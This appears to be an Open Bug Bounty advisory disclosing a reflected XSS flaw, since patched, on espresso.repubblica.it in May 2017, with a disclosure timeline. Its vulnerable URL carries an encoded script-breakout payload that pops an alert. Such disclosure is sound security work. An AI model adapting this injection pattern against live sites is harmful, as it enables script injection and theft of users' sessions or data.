espresso.repubblica.it XSS vulnerability

2017-05-14T15:43:00
ID OBB:236960
Type openbugbounty
Reporter evaristegal0is
Modified 2017-05-20T10:00:00

Description

Vulnerable URL:
http://espresso.repubblica.it/ricerca?query=&dateFromForm;=%3C/script%3E%22%3E%3Cscript%3Ealert%28%27OPENBUGBOUNTY%27%29%3C/script%3E&dateToForm;=&dateFrom;=&dateTo;=&author;=visco&sort;=date
Details:

Description| Value
---|---
Patched:| Yes, at 19.05.2017
Latest check for patch:| 19.05.2017 13:21 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 424
VIP website status:| Yes
Check espresso.repubblica.it SSL connection:| (Grade: B)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 14 May, 2017 15:43 GMT
Generic security notifications sent to website owner| 14 May, 2017 15:46 GMT
Customized security notification sent to website owner| 14 May, 2017 15:46 GMT
Notification sent to subscribers (without technical details)| 14 May, 2017 18:17 GMT
Vulnerability patched by the website owner| 20 May, 2017 05:38 GMT
Vulnerability details disclosed by researcher| 20 May, 2017 10:00 GMT